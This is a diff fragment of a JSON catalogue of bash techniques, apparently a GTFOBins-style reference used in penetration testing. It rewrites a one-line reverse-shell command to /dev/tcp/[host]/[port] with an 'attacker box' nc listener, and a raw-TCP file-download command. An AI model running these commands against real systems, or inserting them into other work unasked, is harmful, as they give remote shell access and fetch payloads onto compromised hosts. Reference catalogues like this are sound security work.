|
|
|
@ -8,7 +8,7 @@
|
|
|
|
|
"reverse-shell": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
|
|
|
|
|
"code": "bash -c 'bash -i &>/dev/tcp/[host]/[port] 0<&1'\n"
|
|
|
|
|
"code": "bash -c 'exec bash -i &>/dev/tcp/[host]/[port] <&1'\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"file-upload": [
|
|
|
|
@ -24,7 +24,7 @@
|
|
|
|
|
"file-download": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Fetch a remote file via HTTP GET request.",
|
|
|
|
|
"code": "export RHOST=[host]\nexport RPORT=[port]\nexport LFILE=[file]\nbash -c '{ echo -ne \"GET /$LFILE HTTP/1.0\\r\\nhost: $RHOST\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/$RHOST/$RPORT \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > $LFILE'\n"
|
|
|
|
|
"code": "bash -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/[host]/[port] \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
|
|
|
|
|